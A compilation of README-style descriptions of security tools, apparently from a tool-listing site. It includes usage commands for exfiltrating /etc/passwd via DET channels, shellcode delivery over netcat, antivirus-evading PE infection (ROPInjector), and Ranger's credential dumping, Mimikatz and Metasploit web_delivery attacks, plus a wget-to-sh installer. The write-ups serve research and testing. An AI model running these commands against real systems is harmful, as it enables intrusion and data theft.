
GEF - Multi-Architecture GDB Enhanced Features for Exploiters & Reverse-Engineers

GEF is aimed mostly at exploiters and reverse-engineers. It provides additional features to GDB using the Python API to assist during the process of dynamic analysis or exploit development.
GEF fully relies on the GDB API and other Linux-specific sources of information (such as /proc/<pid>). As a consequence, some of the features might not work on custom or hardened systems such as GrSec. It fully supports both Python2 and Python3 indifferently (as more and more distros start shipping GDB compiled with Python3 support).
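To give a concrete feel for the mechanism GEF builds on, below is a minimal sketch of a custom command written against the stock GDB Python API. This is illustrative only - it is not GEF code.
# save as simple_regs.py and load inside GDB with: source simple_regs.py
import gdb

class SimpleRegs(gdb.Command):
    """Print the program counter and stack pointer of the selected frame."""

    def __init__(self):
        super(SimpleRegs, self).__init__("simple-regs", gdb.COMMAND_USER)

    def invoke(self, arg, from_tty):
        for reg in ("$pc", "$sp"):
            # parse_and_eval exposes registers and expressions to Python
            print("{} = {}".format(reg, gdb.parse_and_eval(reg)))

SimpleRegs()  # commands register themselves on instantiation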

Quick start
Simply make sure you have GDB 7.x or later.
 $ wget -q -O- https://github.com/hugsy/gef/raw/master/gef.sh | sh
Then just start playing (for local files):
$ gdb -q /path/to/my/bin
gef> gef help
Or (for remote debugging)
remote:~ $ gdbserver 0.0.0.0:1234 /path/to/file 
And
local:~ $ gdb -q
gef> gef-remote your.ip.address:1234

Show me

x86

ARM

PowerPC

MIPS

Dependencies
There are none: GEF works out of the box! However, to enjoy all the coolest features, it is recommended to install Capstone, ROPgadget and radare2-python.
Note : if you are using GDB with Python3 support, you cannot use ROPgadget, as Python3 support has not been implemented yet. Capstone and radare2-python will work just fine.
Another note : Capstone is packaged for Python 2 and 3 with pip . So a quick install is
$ pip2 install capstone    # for Python2.x
$ pip3 install capstone # for Python3.x
The same goes for ropgadget:
$ pip[23] install ropgadget
The assemble command relies on the binary rasm2 provided by radare2 .



v0lt - Security CTF Toy Tools


v0lt is an attempt to regroup every tool I used/use/will use in security CTFs, Python style. A lot of exercises were solved using bash scripts, but Python may be more flexible, hence this toolkit. Nothing to do with Gallopsled. It's a toy toolkit, with small but specific utils only.

Requirements and Installation

Dependencies:
  • Libmagic
  • Python3
    • BeautifulSoup
    • Requests
    • filemagic
    • hexdump
    • passlib

Installation:
# for v0lt install
git clone https://github.com/P1kachu/v0lt.git
cd v0lt
[sudo] python3 setup.py install # sudo is required for potentially missing dependencies

Demo: Shellcodes
>>> from v0lt import *
>>> nc = Netcat("archpichu.ddns.net", 65102)
Connected to port 65102
>>> print(nc.read())
GIVE ME SHELLCODZ
>>> shellhack = ShellHack(4096, "bin","execve")
>>> shellhack.get_shellcodes(shellhack.keywords)

...<SNIPPED>...
85: Linux/x86:setuid(0) & execve(/sbin/poweroff -f) - 47 bytes
86: Linux/x86:execve (/bin/sh) - 21 Bytes
87: Linux/x86:break chroot execve /bin/sh - 80 bytes
88: Linux/x86:execve(/bin/sh,0,0) - 21 bytes
...<SNIPPED>...

Selection: 86
Your choice: http://shell-storm.org/shellcode/files/shellcode-752.php
Shellcode: "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[...]"

>>> nc.shellcat(shellhack.shellcode)
>>> nc.writeln(shellhack.pad())
>>> exploit = nc.dialogue("cat flag", 3)
>>> print(exploit)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
File name too long
P1kaCTF{sh3llc0de_1s_e4zY}

Implemented:
  • Crypto
    • Base64
    • Caesar shift
    • Hashing functions (SHA, MD5)
    • Bits manipulations (XOR, inverse XOR)
    • Usual conversions (bytes, strings, hex)
    • RSA basics (inverse modulo, inverse power, egcd...)
    • Bruteforcing (Dictionary, custom word)
  • Shellcodes
    • Shellcode selection and download from Shell-storm repo
    • Shellcode formatter
    • Shell{cat,net}: Sending shellcode made easy
    • Automatic padding
  • Easy connection support
    • Netcat
    • Telnet
More examples are available here
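To illustrate two of the crypto primitives listed above (the Caesar shift and XOR), here is a plain-Python sketch; it mirrors the idea but is not v0lt's actual API:
def caesar(text, shift):
    # shift alphabetic characters, leave everything else untouched
    out = []
    for c in text:
        if c.isalpha():
            base = ord('A') if c.isupper() else ord('a')
            out.append(chr((ord(c) - base + shift) % 26 + base))
        else:
            out.append(c)
    return "".join(out)

def xor(data, key):
    # repeating-key XOR over raw bytes; applying it twice restores the input
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

print(caesar("P1kaCTF", 3))           # -> S1ndFWI
print(xor(xor(b"flag", b"k"), b"k"))  # -> b'flag'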

Changelog
Only includes major features and changes. Bugfixes and minor changes are omitted.

1.3
  • Lots of fixes again
  • Hexeditor (Dump/Rewrite files)
  • Unix password bruteforce cracker

1.2
  • Lots of documentation/bugs/framework fixes
  • Added bruteforce
  • Added linux utils
  • Began hexeditor
  • Shellhack fixes
  • Alert messages

1.0
  • Lots of documentation fixes
  • Lots of bugfixes
  • Added shellhack (shellcodes stuff)
  • Added crypto utils
  • Added network utils
  • Fixed project tree


FruityWifi v2.4 - Wireless Network Auditing Tool


FruityWifi is a wireless network auditing tool. The application can be installed on any Debian-based system by adding the extra packages. Tested on Debian, Kali Linux, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi), Pwnpi (Raspberry Pi), and Bugtraq.

v2.4
  • Utils have been added (replaces "ifconfig -a")
  • Kali Linux Rolling compatibility issue has been fixed

v2.3
  • monitor mode (mon0) has been fixed (new airmon-ng compatibility issue)

v2.2
  • Wireless service has been replaced by AP module
  • Mobile support has been added
  • Bootstrap support has been added
  • Token auth has been added
  • minor fix

v2.1
  • Hostapd Mana support has been added
  • Phishing service has been replaced by phishing module
  • Karma service has been replaced by karma module
  • Sudo has been implemented (replacement for danger)
  • Logs path can be changed
  • Squid dependencies have been removed from FruityWifi installer
  • Phishing dependencies have been removed from FruityWifi installer
  • New AP options available: hostapd, hostapd-mana, hostapd-karma, airmon-ng
  • Domain name can be changed from config panel
  • New install options have been added to install-FruityWifi.sh
  • Install/Remove have been updated

v2.0 (alpha)
  • Web-Interface has been changed (new look and feel, new options).
  • Nginx has replaced Apache2 as default webserver.
  • Installation script has been updated.
  • Config panel has been changed.
  • Network interfaces structure has been changed and renamed.
  • It is possible to use FruityWifi combining multiple networks and setups.
  • Supplicant mode has been added as a module.
  • 3G/4G Broadband Mobile has been added as a module.
  • FruityWifi HTTP webinterface on port 8000
  • FruityWifi HTTPS webinterface on port 8443

v1.9
  • Service Karma has been replaced by Karma module
  • Service Supplicant has been replaced by nmcli module
  • Config page has been updated
  • Supplicant config has been changed (nmcli module is required)
  • dnspoof host file has been removed from config page (dnsspoof module is required)
  • Logs page has been updated
  • WSDL has been updated
  • Hostapd/Karma has been removed from installer (replaced by Karma module)
  • NetworkManager has been removed from installer (replaced by nmcli module)
  • install-modules.py has been added (install all modules from console)

v1.8
  • WSDL has been added
  • new status page has been added
  • logs can follow in realtime using the new status page (wsdl)

v1.6
  • Dependencies can be installed from module windows
  • minor fix

v1.5
  • New functions have been added
  • Source code has been changed (open file function)
  • minor fix

v1.4
  • New functions have been added (monitor mode)
  • config page has been changed
  • minor fix

v1.3
  • Directory structure has been changed
  • minor fix

v1.2
  • Installation script has been updated
  • SSLstrip fork (@xtr4nge) has been added (Inject + Tamperer options)
  • minor fix

v1.1
  • External modules can be installed from modules page
  • minor fix

v1.0
  • init


OnionScan - Onion Services Security Scan


The purpose of this tool is to make you a better onion service provider. You owe it to yourself and your users to ensure that attackers cannot easily exploit and deanonymize your service.

Go Dependencies
  • h12.me/socks - For the Tor SOCKS Proxy connection.
  • github.com/xiam/exif - For EXIF data extraction.
  • github.com/mvdan/xurls - For some URL parsing.

OS Package Dependencies
  • libexif-dev on Debian based OS
  • libexif-devel on Fedora

Installing

Install OS dependencies
  • On Debian based operating systems:
         sudo apt-get install libexif-dev    
  • On Fedora based operating systems:
         sudo dnf install libexif-devel    

Grab with go get
    go get github.com/s-rah/onionscan   


Compile/Run from git cloned source
    go install github.com/s-rah/onionscan   
and then run the program in
    ./bin/onionscan   
.
Or, you can just do
    go run github.com/s-rah/onionscan.go   
to execute without compiling.

Running
For a simple report detailing the high, medium and low risk areas found:
    ./bin/onionscan blahblahblah.onion   

The most interesting output comes from the verbose option:
    ./bin/onionscan --verbose blahblahblah.onion   

There is also a JSON output, if you want to integrate with something else:
    ./bin/onionscan --jsonReport blahblahblah.onion   

If you would like to use a proxy server listening on something other than
    127.0.0.1:9050   
, then you can use the --torProxyAddress flag:
    ./bin/onionscan --torProxyAddress=127.0.0.1:9150 blahblahblah.onion   


Apache mod_status Protection
This should not be news: you should not have it enabled. If you do have it enabled, attackers can:
  • Build a better fingerprint of your server, including php and other software versions.
  • Determine client IP addresses if you are co-hosting a clearnet site.
  • Determine your IP address if your setup allows.
  • Determine other sites you are co-hosting.
  • Determine how active your site is.
  • Find secret or hidden areas of your site.
  • and much, much more.
Seriously, don't even run the tool, go to your site and check if you have /server-status reachable. If you do, turn it off!
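A quick manual check is a one-liner in a browser, but here is a hedged Python sketch of the same test through a local Tor SOCKS proxy (requires pip install requests[socks]; the .onion address below is a placeholder):
import requests

proxies = {"http": "socks5h://127.0.0.1:9050"}  # socks5h resolves the hostname via Tor
url = "http://blahblahblah.onion/server-status"

r = requests.get(url, proxies=proxies, timeout=120)
if r.status_code == 200 and "Apache Server Status" in r.text:
    print("mod_status is exposed - turn it off!")
else:
    print("no mod_status page found (HTTP %d)" % r.status_code)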

Open Directories
Basic web security 101, if you leave directories open then people are going to scan them, and find interesting things - old versions of images, temp files etc.
Many sites use common structures style/ , images/ etc. The tool checks for common variations, and allows the user to submit others for testing.

EXIF Tags
Whether you create them yourself or allow users to upload images, you need to ensure the metadata associated with the image is stripped.
Many, many websites still do not properly sanitise image data, leaving themselves or their users at risk of deanonymization.

Server Fingerprint
Sometimes, even without mod_status, we can determine whether two sites are hosted on the same infrastructure. We can use the following attributes to make this distinction:
  • Server HTTP Header
  • Technology Stack (e.g. php, jquery version etc.)
  • Website folder layout e.g. do you use /style or /css or do you use wordpress.
  • Fingerprints of images
  • GPG Versions being used.
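As a naive illustration of the idea (a sketch of the concept, not OnionScan's implementation), hashing a few stable response attributes yields a comparable fingerprint; two sites sharing the digest may share infrastructure:
import hashlib

def fingerprint(server_header, tech_stack, folders):
    # order-independent: sort the attribute lists before hashing
    material = "|".join([server_header] + sorted(tech_stack) + sorted(folders))
    return hashlib.sha1(material.encode("utf-8")).hexdigest()

site_a = fingerprint("Apache/2.4.10 (Debian)", ["php/5.6", "jquery/1.11"], ["/style", "/images"])
site_b = fingerprint("Apache/2.4.10 (Debian)", ["php/5.6", "jquery/1.11"], ["/style", "/images"])
print(site_a == site_b)  # identical attributes -> identical fingerprint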


DET - Data Exfiltration Toolkit

DET (provided AS IS) is a proof of concept to perform Data Exfiltration using either single or multiple channel(s) at the same time. The idea was to create a generic toolkit to plug in any kind of protocol/service.

Slides
DET was presented at BSides Ljubljana on the 9th of March 2016. Slides are available here .

Example usage (ICMP plugin)

Server-side:

Client-side:

Usage while combining two channels (Gmail/Twitter)

Server-side:

Client-side:

Installation
Clone the repo:
git clone https://github.com/sensepost/DET.git
Then:
pip install -r requirements.txt --user

Configuration
In order to use DET, you will need to configure it and add your proper settings (e.g. SMTP/IMAP, AES256 encryption passphrase and so on). A configuration example file has been provided, called config-sample.json :
{
"plugins": {
"http": {
"target": "192.168.1.101",
"port": 8080
},
"google_docs": {
"target": "192.168.1.101",
"port": 8080,
},
"dns": {
"key": "google.com",
"target": "192.168.1.101",
"port": 53
},
"gmail": {
"username": "dataexfil@gmail.com",
"password": "ReallyStrongPassword",
"server": "smtp.gmail.com",
"port": 587
},
"tcp": {
"target": "192.168.1.101",
"port": 6969
},
"udp": {
"target": "192.168.1.101",
"port": 6969
},
"twitter": {
"username": "PaulWebSec",
"CONSUMER_TOKEN": "XXXXXXXXX",
"CONSUMER_SECRET": "XXXXXXXXX",
"ACCESS_TOKEN": "XXXXXXXXX",
"ACCESS_TOKEN_SECRET": "XXXXXXXXX"
},
"icmp": {
"target": "192.168.1.101"
}
},
"AES_KEY": "THISISACRAZYKEY",
"sleep_time": 10
}
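As a minimal sketch of how this file is consumed (mirroring, not reproducing, what det.py does with -c), the configuration can be loaded and its enabled plugins listed in a few lines:
import json

with open("config-sample.json") as f:
    config = json.load(f)

print("AES key set :", bool(config.get("AES_KEY")))
print("sleep_time  :", config.get("sleep_time"))
for name, settings in config["plugins"].items():
    # plugins point either at a listener (target) or a mail server (server)
    endpoint = settings.get("target") or settings.get("server", "-")
    print("plugin %-12s -> %s" % (name, endpoint))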

Usage

Help usage
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
[-L]

Data Exfiltration Toolkit (SensePost)

optional arguments:
-h, --help show this help message and exit
-c CONFIG Configuration file (eg. '-c ./config-sample.json')
-f FILE File to exfiltrate (eg. '-f /etc/passwd')
-d FOLDER Folder to exfiltrate (eg. '-d /etc/')
-p PLUGIN Plugins to use (eg. '-p dns,twitter')
-e EXCLUDE Plugins to exclude (eg. '-e gmail,icmp')
-L Server mode

Server-side:
To load every plugin:
python det.py -L -c ./config.json
To load only twitter and gmail modules:
python det.py -L -c ./config.json -p twitter,gmail
To load every plugin and exclude DNS:
python det.py -L -c ./config.json -e dns

Client-side:
To load every plugin:
python det.py -c ./config.json -f /etc/passwd
To load only twitter and gmail modules:
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd
To load every plugin and exclude DNS:
python det.py -c ./config.json -e dns -f /etc/passwd
And in PowerShell (HTTP module):
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'

Modules
So far, DET supports multiple protocols, listed here:
  • HTTP(S)
  • ICMP
  • DNS
  • SMTP/IMAP (eg. Gmail)
  • Raw TCP
  • PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))
And other "services":
  • Google Docs (Unauthenticated)
  • Twitter (Direct Messages)

Experimental modules
I am currently implementing new modules which are almost ready to ship, including:
  • Skype (95% done)
  • Tor (80% done)
  • Github (30/40% done)

Roadmap

References
Some pretty cool references/credits to people whose projects I was inspired by:

PeerTweet - Decentralized Feeds using BitTorrent's DHT


BitTorrent's DHT is probably one of the most resilient and censorship-resistant networks on the internet. PeerTweet uses this network to allow users to broadcast tweets to anyone who is listening. When you start PeerTweet, it generates a hash @33cwte8iwWn7uhtj9MKCs4q5Ax7B which is similar to your Twitter username (e.g. @lmatteis ). The difference is that you have full control over what can be posted, because only you own the private key associated with such an address. Furthermore, thanks to the DHT, what you post cannot be stopped by any government or institution.
Once you find other PeerTweet addresses you trust (and are not spam), you can follow them. This configures your client to store those users' tweets and broadcast them to the DHT every once in a while to keep their feeds alive. This cooperation of following accounts allows feeds to stay alive in the DHT network. The PeerTweet protocol also publishes your actions, such as I just followed @919c.. , I just liked @9139.. and I just retweeted @5789.. . This opens the possibility for new users to find other addresses they can trust; if I trust the user @6749.. and they're following @9801.. , then perhaps I can mark @9801.. as not spam. This idea of publicly tweeting about your actions also allows for powerful future crawling analysis of this social graph.

How does it work?
PeerTweet follows most of the implementation guidelines provided by the DHT RSS feed proposal http://libtorrent.org/dht_rss.html . We implemented it on top of the current BEP44 proposal which provides get() and put() functionality over the DHT network. This means that, rather than only using the DHT to announce which torrents one is currently downloading, we can use it to also put and get small amounts of data (roughly 1000 bytes).
PeerTweet differentiates between two types of items:
  1. Your feed head . Which is the only mutable item of your feed, and is what your followers use to download your items and find updates. Your head's hash is what your followers use to know about updates - it's your identity and can be used to let others know about your feed (similar to your @lmatteis handle). The feed head is roughly structured as follows:
    {
    "d": <unsigned int of minutes passed from epoch until head was modified>,
    "next": <up to 80 bytes of the next 4 items in the feed, directly 1,2,3 and 4 hops away. 20 bytes each.>,
    "n": <utf8 name of the feed>,
    "a": <utf8 http url of an image to render as your avatar>,
    "i": <utf8 description of your feed>
    }
  2. Your feed items . These are immutable items which contain your actual tweets and are structured:
    {
    "d": <unsigned int of minutes passed from epoch until when item was created>,
    "next": <up to 80 bytes of the next 4 items in the feed, 1, 2, 4 and 8 hops away. 20 bytes each.>,
    "t": <utf8 contents of your tweet. up to 140 chars>
    }
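As a sketch of the item layout above (JSON is used purely for illustration; real BEP44 values are bencoded), building a feed item and checking it fits the roughly 1000-byte DHT limit looks like this:
import json, time

def make_item(tweet, next_hashes):
    return {
        "d": int(time.time() // 60),        # minutes since epoch
        "next": "".join(next_hashes)[:80],  # up to 4 x 20-byte pointers
        "t": tweet[:140],                   # tweet body, capped at 140 chars
    }

item = make_item("hello DHT", ["a" * 20, "b" * 20, "c" * 20, "d" * 20])
encoded = json.dumps(item).encode("utf-8")
assert len(encoded) < 1000, "item too large for a DHT put()"
print(len(encoded), "bytes")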

Skip lists
The reason items have multiple pointers to other items in the list is to allow for parallel lookups. Our skip list implementation differs from regular implementations and is targeted for network lookups, where each item contains 4 pointers so that when we receive an item, we can issue 4 get() requests in parallel to other items in the list. This is crucial for accessing user's feeds in a timely manner because DHT lookups have unpredictable response times.

Following
When you follow someone, you're essentially informing your client to download their feed and republish it every so often. The DHT network is not a persistent one, and items quickly drop out of the network after roughly 30 minutes. In order to keep things alive, having many followers is crucial for the uptime of your feed. Otherwise you can still have a server somewhere running 24/7 which keeps your feed alive by republishing items every 30 minutes.

Install
Install dependencies.
$ npm install

Installing native modules
The app comes with some native bindings. I used this code to make it run on my computer:
Source: https://github.com/atom/electron/blob/master/docs/tutorial/using-native-node-modules.md
npm install --save-dev electron-rebuild

# Every time you run "npm install", run this
./node_modules/.bin/electron-rebuild

# On Windows if you have trouble, try:
.\node_modules\.bin\electron-rebuild.cmd
To get ed25519-supercop to work on Windows I also had to install node-gyp and all the Python2.7 and Visual Studio stuff which node-gyp requires: https://github.com/nodejs/node-gyp
Then run these commands to build it on Windows:
npm install -g node-gyp
cd ./node_modules/ed25519-supercop/
HOME=~/.electron-gyp node-gyp rebuild --target=0.36.9 --arch=x64 --dist-url=https://atom.io/download/atom-shell

Run
Run these two commands simultaneously in different console tabs.
$ npm run hot-server
$ npm run start-hot
Note: requires a node version >= 4 and an npm version >= 2.

Toggle Chrome DevTools
  • OS X: Cmd Alt I or F12
  • Linux: Ctrl Shift I or F12
  • Windows: Ctrl Shift I or F12
See electron-debug for more information.

Toggle Redux DevTools
  • All platforms: Ctrl+H
See redux-devtools-dock-monitor for more information.

Externals
If you use any 3rd party libraries which can't be built with webpack, you must list them in your webpack.config.base.js
externals: [
// put your node 3rd party libraries which can't be built with webpack here (mysql, mongodb, and so on..)
]
You can find those lines in the file.

CSS Modules support
Import css file as css-modules using .module.css .

Package
$ npm run package
To package apps for all platforms:
$ npm run package-all

Options
  • --name, -n: Application name (default: ElectronReact)
  • --version, -v: Electron version (default: latest version)
  • --asar, -a: asar support (default: false)
  • --icon, -i: Application icon
  • --all: pack for all platforms
Use electron-packager to pack your app with the --all option for the darwin (OS X), linux and win32 (Windows) platforms. After the build, you will find the packages in the release folder. Otherwise, you will only find one for your OS.
test , tools , release folder and devDependencies in package.json will be ignored by default.

Default Ignore modules
We add some modules' peerDependencies to the ignore option by default to reduce application size.
  • babel-core is required by babel-loader and its size is ~19 MB
  • node-libs-browser is required by webpack and its size is ~3MB.
Note: If you want to use any of the above modules at runtime, for example require('babel/register') , you should move them from devDependencies to dependencies .


ROPInjector - Convert any Shellcode into ROP and patch it into a given Portable Executable (PE)

A tool written in C (Win32) to convert any shellcode into ROP and patch it into a given portable executable (PE). It supports only 32-bit target PEs and the x86 instruction set.
Published at Black Hat USA 2015: "ROPInjector: Using Return Oriented Programming for Polymorphism and Antivirus Evasion". More info:

Usage
  ropinjector <file-to-infect> <shellcode-file> <output-file>* [options]*
(* denotes optional arguments)
e.g.
ropinjector.exe firefox.exe revshell.txt
  • file-to-infect : any 32-bit, non-packed PE
  • shellcode-file : the shellcode to patch in the PE file
  • output-file (optional) : The name of the output file. If not specified, ROPInjector will choose a suitable filename indicating the type of injection performed.
  • options :

text Force reading of shellcode file as text file. Shellcode in text
form must be in the \xHH\xHH\xHH format.

norop Don't transform shellcode to ROP.

nounroll Don't unroll SIBs.

noinj Don't inject missing gadgets.

getpc Don't replace getPC constructs in the shellcode.

entry Have shellcode run before the original PE code. Without this
option, ROPInjector will try to hook calls to ExitProcess(),
exit() and the like so that the shellcode runs last, right
before process exit.

-d<secs> Number of seconds to Sleep() before executing the shellcode.
When this option is specified, "entry" is also implicitly used.
ROPInjector will output some comma-delimited stats at the end. These are (in order of appearance):
  • the carrier PE filename
  • the output filename of the resulting patched file
  • initial size of the PE file in bytes
  • shellcode size in bytes
  • patch size in bytes
  • whether unroll is performed
  • whether shellcode has been converted to ROP
  • whether getPC constructs are replaced in the shellcode
  • whether access is given to the shellcode during entry (run first) or during exit (run last)
  • the delay the shellcode sleeps before it runs in seconds
  • initial number of instructions in the shellcode
  • number of instructions in the shellcode after unrolling and other manipulations, but before ROP
  • number of instructions replaced by ROP gadgets (out of the ones in the previous metric, and not the initial number of instructions)
  • number of gadgets injected
  • number of gadget segments
  • number of instructions replaced by injected gadgets

Download ROPInjector

Ranger - Tool To Access And Interact With Remote Microsoft Windows Based Systems


A tool to help security professionals access and interact with remote Microsoft Windows based systems.
This project was conceptualized with a simple thought process: we did not invent the bow or the arrow, just a more efficient way of using them.
Ranger is a command-line driven attack and penetration testing tool, which has the ability to use an instantiated catapult server to deliver capabilities against Windows systems. As long as a user has a set of credentials or a hash set (NTLM, LM, LM:NTLM), he or she can gain access to systems that are a part of the trust.
Using this capability, a security professional can extract credentials out of memory in clear-text, access SAM tables, run commands, execute PowerShell scripts, Windows binaries, and other tools.
At this time the tool bypasses the majority of IPS vendor solutions unless they have been custom tuned to detect it. The tool was developed using our home labs in an effort to support security professionals doing legally and/or contractually supported activities.
More functionality is being added, but at this time the tool uses community contributions from repositories related to the PowerShell PowerView, PowerShell Mimikatz and Impacket teams.

Managing Ranger:

Install:
wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh

Update:
ranger --update

Usage:
  • Ranger uses a combination of methods and attacks; a method is used to deliver an attack/command
  • An attack is what you are trying to accomplish
  • Some items are both a method and attack rolled into one and some methods cannot use some of the attacks due to current limitations in the libraries or protocols

Methods & Attacks:
--scout
--secrets-dump

Method:
--wmiexec
--psexec
--atexec

Attack:
--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access

Command Execution:

Find Logged In Users:
ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout

SMBEXEC Command Shell:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv

PSEXEC Command Shell:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv

PSEXEC Command Execution:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv

WMIEXEC Command Execution:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"

WMIEXEC PowerShell Mimikatz Memory Injector:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker

WMIEXEC Metasploit web_delivery Memory Injector (requires Metasploit config see below):
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader

WMIEXEC Custom Code Memory Injector:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c "binary.exe"

ATEXEC Command Execution:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder

ATEXEC PowerShell Mimikatz Memory Injector:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder

ATEXEC Metasploit web_delivery Memory Injector (requires Metasploit config see below):
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder

ATEXEC Custom Code Memory Injector:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c "binary.exe" --no-encoder

SECRETSDUMP Custom Code Memory Injector:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump

Create Pasteable Mimikatz Attack:
ranger.py --invoker -q -v -vv -vvv

Create Pasteable web_delivery Attack (requires Metasploit config see below):
ranger.py --downloader -q -v -vv -vvv

Create Pasteable Executor Attack:
ranger.py --executor -q -v -vv -vvv

Identifying Groups Members and Domains
  • When identifying groups make sure to determine what the actual query domain is with the --get-domain-membership
  • Then when you query a group use the optional --domain , which allows you to target a different domain than the one you logged into
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"

Notes About Usage:

Cred File Format:
  • You can pass it a list of usernames and passwords or hashes in the following format in the same file:
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain
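A hedged sketch of parsing the two most common line shapes above (username secret [domain]) into tuples; this is an illustration, not ranger's actual parser, and it does not cover the bare PWDUMP forms:
def parse_cred_line(line, default_domain="WORKGROUP"):
    parts = line.split()
    if len(parts) == 3:
        user, secret, domain = parts
    elif len(parts) == 2:
        user, secret = parts
        domain = default_domain
    else:
        raise ValueError("unhandled line format: %r" % line)
    kind = "hash" if ":" in secret else "password"
    return user, secret, kind, domain

print(parse_cred_line("administrator Password1"))
print(parse_cred_line("administrator aad3b435b51404ee:31d6cfe0d16ae931 Domain.local"))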

Credential File Caveats:
  • If you provide domain names in the file they will be used instead of the default WORKGROUP.
  • If you supply the domain name by command line -d , it will infer that you want to ignore all the domain names in the file.

Command Line Execution:
  • If you do not want to use the file you can pass the details through command line directly.
  • If you wish to supply hashes instead of passwords just pass them through the password argument.
  • If they are PWDUMP format and you supply no username it will pull the username out of the hash.
  • If you supply a username it will think that the same hash applies to a different user.
  • Use the following formats for password:
password
LM:NTLM
:NTLM
PWDUMP

Targets and Target Lists:
  • You can provide a list of targets either by using a target list or through the target option.
  • You can supply multiple target list files by comma separating them and it will aggregate the data and remove duplicates and then exclude your IP address from the default interface or the interface you provide.
  • The tool accepts CIDR notations, small ranges (192.168.195.1-100), large ranges (192.168.194.1-192.163.1.1) or single IP addresses.
  • Again, just comma separate them on the command line or put them in a newline-delimited file.

Exclusions and Exclusion Lists:
  • You can exclude targets using the exclude arguments as well; so if you need to avoid a small Class C inside a larger Class A range, it will figure that out for you.

Intrusion Protection Systems (IPS):
  • Mimikatz, Downloader and Executor use PowerShell memory injection by calling other services and protocols.
  • The commands are double encoded and bypass current IPS solutions (even next-gen) unless specifically tuned to catch these attacks.
  • ATEXEC is the only one that currently lands on disk and does not encode; I still have some rewriting to do.

Web_delivery attacks:
  • To set up Metasploit for the web_delivery exploit, start up Metasploit and configure the exploit to meet the following conditions.
use exploit/multi/script/web_delivery
set targets 2
set payload <choose your desired payload>
set lhost <your IP>
set lport <port for the shell make sure it is not a conflicting port>
set URIPATH /
set SRVPORT <the same as what is set by the -r option in ranger, defaults to 8888>
exploit -j

FAQ

Access Denied Errors for SMBEXEC and WMIEXEC
I'm getting access denied errors on Windows machines that are part of a WORKGROUP.
When not part of a domain, Windows by default does not have any administrative shares. SMBEXEC relies on shares being enabled. Additionally, WMIC isn't enabled on WORKGROUP machines. SMBEXEC and WMIEXEC are made to target protocols enabled on domain systems. While it's certainly possible to enable these functions on a WORKGROUP system, note that you are introducing vulnerable protocols (after all, that's what this tool is made to attack). Enabling these features on your primary home system that your significant other uses for Facebook as well is probably not the best idea.
  • Make sure this is a test box you own. You can force the shares to be enabled by following the instructions here: http://www.wintips.org/how-to-enable-admin-shares-windows-7/
  • If you want to determine what shares are exposed and then target them, you can use a tool like enum4linux and then use the --share share_name argument in ranger to try and execute SMBEXEC.

Future Features:

Nmap:
  • The nmap XML feed is still in DRAFT and it is not functioning yet.

Credential Parsing:
  • Clean credential parsing is in development to dump to files.

Colored Output:
  • Add colored output with https://pypi.python.org/pypi/colorama

Presented At:
BSides Charm City 2016: April 23, 2016

Distributions the tool is a part of:
Black Arch Linux



Tsusen - Network Traffic Sensor

Tsusen (津波センサー) is a standalone network sensor made for gathering information from the regular traffic coming from the outside (i.e. the Internet) on a daily basis (e.g. mass-scans, service-scanners, etc.). Any disturbances should be closely watched for, as those can become a good prediction base for forthcoming events. For example, exploitation of a newly found web service vulnerability (e.g. Heartbleed) should generate a visible "spike" in the total number of "intruders" on the affected network port.

The following set of commands should get your Tsusen sensor up and running (out of the box with default settings and monitoring interface any and HTTP reporting interface on default port 8339 ):
sudo apt-get install python-pcapy
sudo pip install python-geoip python-geoip-geolite2
cd /tmp/
git clone https://github.com/stamparm/tsusen.git
cd tsusen/
sudo python tsusen.py



Sensor's results are stored locally in CSV files on a daily basis (e.g. 2015-10-27.csv ) with periodic (flush) writes of the current day's data (e.g. every 15 minutes). Sample results are as follows:
proto dst_port dst_ip src_ip first_seen last_seen count
TCP 1080 192.165.63.181 222.186.56.107 1446188056 1446188056 1
TCP 1080 192.165.63.181 64.125.239.78 1446191096 1446191096 1
